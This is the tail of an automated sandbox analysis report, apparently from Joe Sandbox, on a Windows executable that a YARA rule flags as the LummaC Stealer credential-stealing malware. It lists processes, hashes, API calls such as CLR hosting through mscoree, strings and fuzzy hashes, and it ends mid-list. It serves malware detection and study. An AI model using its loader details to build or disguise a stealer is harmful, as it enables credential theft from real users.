6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:09.386145115 CEST	49	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	00:05:55
Start date:	24/10/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x800000
File size:	4'075'136 bytes
MD5 hash:	863219F7D35D1E33F1B05DDC2BB42FAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1722309595.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:06:02
Start date:	24/10/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0x5a0000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	12.8%
Signature Coverage:	3.5%
Total number of Nodes:	1439
Total number of Limit Nodes:	78

Executed Functions

Function 6D08B6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6D08B73F
VariantInit.OLEAUT32(?), ref: 6D08B748
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D08B7BE
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D08B7F5
VariantClear.OLEAUT32(?), ref: 6D08B801

Part of subcall function 6D08C850: VariantInit.OLEAUT32(?), ref: 6D08C88F
Part of subcall function 6D08C850: VariantInit.OLEAUT32(?), ref: 6D08C895
Part of subcall function 6D08C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D08C8A0
Part of subcall function 6D08C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D08C8D5
Part of subcall function 6D08C850: VariantClear.OLEAUT32(?), ref: 6D08C8E1

VariantClear.OLEAUT32(?), ref: 6D08BA15
SafeArrayDestroy.OLEAUT32(?), ref: 6D08BE90
VariantClear.OLEAUT32(?), ref: 6D08BEA3
VariantClear.OLEAUT32(?), ref: 6D08BEA9

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 2f0a87bd4125cf330b5b3ff236c65a1862d4eaeb3946549ec73cf0ffce822bc5
Instruction ID: 2cca902ad3c01fcac57ce7fa365417356e7b13dea6589ef7686ddb52f28ba0a3
Opcode Fuzzy Hash: 2f0a87bd4125cf330b5b3ff236c65a1862d4eaeb3946549ec73cf0ffce822bc5
Instruction Fuzzy Hash: C5525B75900219DFEF10DFA8C884BEEBBF5BF89300F158199E919AB341DB70A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 060F0EB3 Relevance: 29.6, Strings: 23, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p<^q, xrefs: 060F118D
LOOK, xrefs: 060F19EB
Gvq, xrefs: 060F1243
LOOK, xrefs: 060F158D
p<^q, xrefs: 060F112C
p<^q, xrefs: 060F1142
p<^q, xrefs: 060F1177
HERE, xrefs: 060F19F0
Gvq, xrefs: 060F1CCD
HERE, xrefs: 060F0F6F
LOOK, xrefs: 060F1A9F
LOOK, xrefs: 060F12E7
LOOK, xrefs: 060F1081
HERE, xrefs: 060F1592
HERE, xrefs: 060F12EC
Gvq, xrefs: 060F16D2
Gvq, xrefs: 060F14CA
Gvq, xrefs: 060F1923
LOOK, xrefs: 060F17E4
HERE, xrefs: 060F17E9
LOOK, xrefs: 060F0F6A
HERE, xrefs: 060F1AA4
HERE, xrefs: 060F1086

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<^q$p<^q$p<^q$p<^q$Gvq$Gvq$Gvq$Gvq$Gvq
API String ID: 0-3728642687
Opcode ID: 7aa9c41110f4647d312aebea44af5dab50dbd59174bcdd9e1e666927078337e0
Instruction ID: 9bda32368491b3364356a69652e434a59fe107527617a5443144019c8d3a53ad
Opcode Fuzzy Hash: 7aa9c41110f4647d312aebea44af5dab50dbd59174bcdd9e1e666927078337e0
Instruction Fuzzy Hash: 60829374E402298FDBA4DF68C998BD9BBF1AB48310F1481E9D50DAB365DB309E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D07B6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,400BD10B), ref: 6D07B711
LoadLibraryW.KERNEL32(mscoree.dll), ref: 6D07B71C
GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6D07B730
__cftoe.LIBCMT ref: 6D07B870
GetModuleHandleW.KERNEL32(?), ref: 6D07B88B
GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6D07B8D7

Strings

mscoree.dll, xrefs: 6D07B70C, 6D07B717
v4.0.30319, xrefs: 6D07B767
CLRCreateInstance, xrefs: 6D07B72A

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad__cftoe
String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
API String ID: 1275574042-506955582
Opcode ID: d38457277014f8585ce16a683e35ac4e2a5225c627363692edb8920d739b3f20
Instruction ID: d3193b962641b81c154fc356fa9e29424d61c64d74317a1507c81d0dbcb6b61c
Opcode Fuzzy Hash: d38457277014f8585ce16a683e35ac4e2a5225c627363692edb8920d739b3f20
Instruction Fuzzy Hash: 88918E70D042499FEB14DFE8C880AAEBBF5FF49310F20856CE569EB241D730A906CB58

Uniqueness

Uniqueness Score: -1.00%

Function 03254548 Relevance: 14.8, Strings: 9, Instructions: 3544COMMON

Download Yara Rule

Strings

(o^q, xrefs: 03254EF9
(o^q, xrefs: 032550AE
4'^q, xrefs: 03255E3B
Hbq, xrefs: 03254F70
4'^q, xrefs: 03256EA9
4'^q, xrefs: 03255FC3
,bq, xrefs: 03254C87
,bq, xrefs: 03254C97
(o^q, xrefs: 03254F03

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq$4'^q$4'^q$4'^q$Hbq
API String ID: 0-1975560490
Opcode ID: 2216c197c6f358896cf6057f0778d76058d33f7b8d416b672e7d61a20e6e1a8e
Instruction ID: 2777053007305e12de784234d66635357b90d6f95ea37d252d53b4b199e5e620
Opcode Fuzzy Hash: 2216c197c6f358896cf6057f0778d76058d33f7b8d416b672e7d61a20e6e1a8e
Instruction Fuzzy Hash: 98731B75A10219CFCB24DF69C888A9DB7B6BF49310F158199E809AB365DB31EEC1CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03253430 Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

$^q, xrefs: 03253446
Xbq, xrefs: 0325345F

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: a53c42b74f91193cb76ed7713ea09a4577acf777470743978ed2ae80c507cd5b
Instruction ID: 019d2ab1954f6613ab095bc467f62f80a299cfe94d9d8feeb263ac0e2d414264
Opcode Fuzzy Hash: a53c42b74f91193cb76ed7713ea09a4577acf777470743978ed2ae80c507cd5b
Instruction Fuzzy Hash: 6981B274B112188BDB58EF78845427E7BF7BFC8750B04882DE506EB388CE75C9468B95

Uniqueness

Uniqueness Score: -1.00%

Function 060F2840 Relevance: 1.8, Strings: 1, Instructions: 576COMMON

Download Yara Rule

Strings

(, xrefs: 060F2F91

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 72d3845b5ca6737e8fb1590e1ff930b9119c927acb025b074c2df4884a0c08f8
Instruction ID: b83d1b183cdbf4e0ee22fc8e5d4665ad89e50f70922e25385f71fea553b62b4d
Opcode Fuzzy Hash: 72d3845b5ca6737e8fb1590e1ff930b9119c927acb025b074c2df4884a0c08f8
Instruction Fuzzy Hash: BB52DF74D012288FDBA8DF65C994BDDBBF2BB88304F1085E9D509AB291DB319E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 03251001 Relevance: 1.5, Instructions: 1545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7877bfa7fe80b7c1287f3080e454f831ceb6b23a5d8ab759eb1ca82b65a11506
Instruction ID: 5f35e7866dde177165d72f37498eb3a6053d84cb5d6383c652c0f66f9288816d
Opcode Fuzzy Hash: 7877bfa7fe80b7c1287f3080e454f831ceb6b23a5d8ab759eb1ca82b65a11506
Instruction Fuzzy Hash: 9813A374A15319CFCB65DF24D894AA9BBB6FB48304F2085E9D80CA7360DB366E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0325B758 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

8cq, xrefs: 0325B7BF

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: 8cq
API String ID: 0-304758316
Opcode ID: eedd28942ad8b17bcbf39721aa155f244145233fd1608b05c0de7c35b7538541
Instruction ID: f1f365ef7cf5701875de9307fbfdb224fc3eb9211ca40891a68019c961e1f49e
Opcode Fuzzy Hash: eedd28942ad8b17bcbf39721aa155f244145233fd1608b05c0de7c35b7538541
Instruction Fuzzy Hash: 0A31F375E412089FDB04CFA8D480AEEBBF6FF89310F10906AE511B7260DB709A45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0325B760 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

8cq, xrefs: 0325B7BF

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: 8cq
API String ID: 0-304758316
Opcode ID: ba3cbe77fd520e3727fa567dc0b7689eff3e6bc766ce984d731afcd11a69cbc7
Instruction ID: e8c7ba601e97e9624728c51e2411837b59959b2f2274e24761809cc103d96a6b
Opcode Fuzzy Hash: ba3cbe77fd520e3727fa567dc0b7689eff3e6bc766ce984d731afcd11a69cbc7
Instruction Fuzzy Hash: 2631E275D41208AFDB04CFA8D480AEEFBF6FF49310F10906AE911B7260DB71AA05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03257E08 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d158fc812848e46dbe8021279d4397dbedd93d689d25f90906579d260a3cdf6
Instruction ID: 22f3d7937b49f5697f14535a6fcbd2cbdc030cdc26677e6a7ef316f662ba5778
Opcode Fuzzy Hash: 7d158fc812848e46dbe8021279d4397dbedd93d689d25f90906579d260a3cdf6
Instruction Fuzzy Hash: 6BB1E935B503128FCB19CF2CC494A6ABBA6BF85740B29C499EC159B361CB71DEC1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0325B869 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e02f964d1e6e6b2a12865a04dfa2b96bf5dfeb2f60f320cdb8f6818d0d6b630a
Instruction ID: 58282a43bd96e723816a55ab0496e7395974450d739a804a22d12a6e8e1a4b33
Opcode Fuzzy Hash: e02f964d1e6e6b2a12865a04dfa2b96bf5dfeb2f60f320cdb8f6818d0d6b630a
Instruction Fuzzy Hash: C4310675D41208AFDB04CFA9D480AEEFBF5FF49310F10906AE511BB260DB719A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0325B870 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c46d5fcfb93e783b52b1d28511bb1978222542ab2697e88b960b066ca364d9ab
Instruction ID: 09331c7d9f98f3fdb9414163341c67e69dddf2c9a9a3019b4074745d0db7416f
Opcode Fuzzy Hash: c46d5fcfb93e783b52b1d28511bb1978222542ab2697e88b960b066ca364d9ab
Instruction Fuzzy Hash: 9431E475D41208AFDB04CFA8D480AEEBBF5FF49310F10946AE911B7260DB719A45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6D089357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0884BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0884D2
SafeArrayGetElement.OLEAUT32 ref: 6D08850A
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0894C1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0894D4
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D08950C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0897A4
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0897B7
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D0897F2

Part of subcall function 6D083A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D083B71
Part of subcall function 6D083A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D083B83

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D089D5F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D089D72
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D089DAF

Part of subcall function 6D083A90: SafeArrayDestroy.OLEAUT32(?), ref: 6D083BCF

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D08A1BC
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D08A1CF
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D08A20C
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Strings

A, xrefs: 6D08AD44

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: A
API String ID: 959723449-3554254475
Opcode ID: 8f138690e63b79d64dbf1f97ff721555add86daaf7a360a62db3c35520da85b2
Instruction ID: 45a08def1d2723d08c424d730cb2cd5813a31ad3af55a127148cee68be16f6f7
Opcode Fuzzy Hash: 8f138690e63b79d64dbf1f97ff721555add86daaf7a360a62db3c35520da85b2
Instruction Fuzzy Hash: 83238474A00205DFEF00DFA4CC84FAD77B9AF49308F658198EA09AF296D775E945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D082970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0829F6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D082A08
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D082A2F
VariantInit.OLEAUT32(?), ref: 6D082ABB
VariantInit.OLEAUT32(?), ref: 6D082B3F
VariantClear.OLEAUT32(?), ref: 6D082C04
VariantClear.OLEAUT32(?), ref: 6D082C0B
VariantClear.OLEAUT32(?), ref: 6D082C12
VariantClear.OLEAUT32(?), ref: 6D082C96
VariantClear.OLEAUT32(?), ref: 6D082C9D
VariantClear.OLEAUT32(?), ref: 6D082CD6
VariantClear.OLEAUT32(?), ref: 6D082CDD
VariantClear.OLEAUT32(?), ref: 6D082CE4
SafeArrayDestroy.OLEAUT32(?), ref: 6D082D1B
VariantClear.OLEAUT32(?), ref: 6D082D45
VariantClear.OLEAUT32(?), ref: 6D082D4C
VariantClear.OLEAUT32(?), ref: 6D082D53

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
String ID:
API String ID: 214056513-0
Opcode ID: 8c6d37d92c31f31507ac3b373f25df20b5925aa0607c1e23b50dee2e813c39d8
Instruction ID: 98f91ecb4db99d0fc46ad46bad04e21d26fc607de8e49ef54257ea18170b27be
Opcode Fuzzy Hash: 8c6d37d92c31f31507ac3b373f25df20b5925aa0607c1e23b50dee2e813c39d8
Instruction Fuzzy Hash: 31C14A716083419FEB10CFA8C884A6BBBE9FF89304F20895DF695CB261D775E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6D07AF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6D07AF75
VariantInit.OLEAUT32(?), ref: 6D07AF7C
VariantInit.OLEAUT32(?), ref: 6D07AF83
VariantCopy.OLEAUT32(?,?), ref: 6D07B00D
VariantClear.OLEAUT32(?), ref: 6D07B027
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D07B19C
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D07B1AA
SafeArrayAccessData.OLEAUT32(?,?), ref: 6D07B1C5
_memmove.LIBCMT ref: 6D07B1E6
SafeArrayUnaccessData.OLEAUT32(?), ref: 6D07B1EF
VariantClear.OLEAUT32(?), ref: 6D07B237
VariantClear.OLEAUT32(?), ref: 6D07B23E
VariantClear.OLEAUT32(?), ref: 6D07B245
VariantClear.OLEAUT32(?), ref: 6D07B29D
VariantClear.OLEAUT32(?), ref: 6D07B2A4
VariantClear.OLEAUT32(?), ref: 6D07B2AB

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
String ID:
API String ID: 3403836469-0
Opcode ID: 11149e690df7e63cc8ecc9711e81381b218ae00e2776458316f46b4cf12ff3db
Instruction ID: 21968fcf8593b2a96f0d63c43656977a1912bc6076769117d9bb6fa7d77f8583
Opcode Fuzzy Hash: 11149e690df7e63cc8ecc9711e81381b218ae00e2776458316f46b4cf12ff3db
Instruction Fuzzy Hash: E5C15BB16083419FE710DFA8C884A6BB7E9FF89704F51896DF659CB250D730E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D08D410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6D08D4B3
VariantInit.OLEAUT32 ref: 6D08D4C5
VariantInit.OLEAUT32(?), ref: 6D08D4CC
_malloc.LIBCMT ref: 6D08D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D08D58B
SafeArrayCreateVector.OLEAUT32 ref: 6D08D5A6
SafeArrayAccessData.OLEAUT32 ref: 6D08D5B8

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
String ID:
API String ID: 1552365394-0
Opcode ID: 7b1c042200a911300b75267ebff711a7965ce6d56ced093bd994044fa65ca4da
Instruction ID: 941bcfe4687aa589a6c045edb5e49cda689055a4f17726deb63671819cb2b6e8
Opcode Fuzzy Hash: 7b1c042200a911300b75267ebff711a7965ce6d56ced093bd994044fa65ca4da
Instruction Fuzzy Hash: B9B156B56083019FE714CF28C880B6AB7F9FFC9714F148A5EE99597251E730E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D08D468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6D08D4B3
VariantInit.OLEAUT32 ref: 6D08D4C5
VariantInit.OLEAUT32(?), ref: 6D08D4CC
_malloc.LIBCMT ref: 6D08D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D08D58B
SafeArrayCreateVector.OLEAUT32 ref: 6D08D5A6
SafeArrayAccessData.OLEAUT32 ref: 6D08D5B8
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D08D601
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D08D63E

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
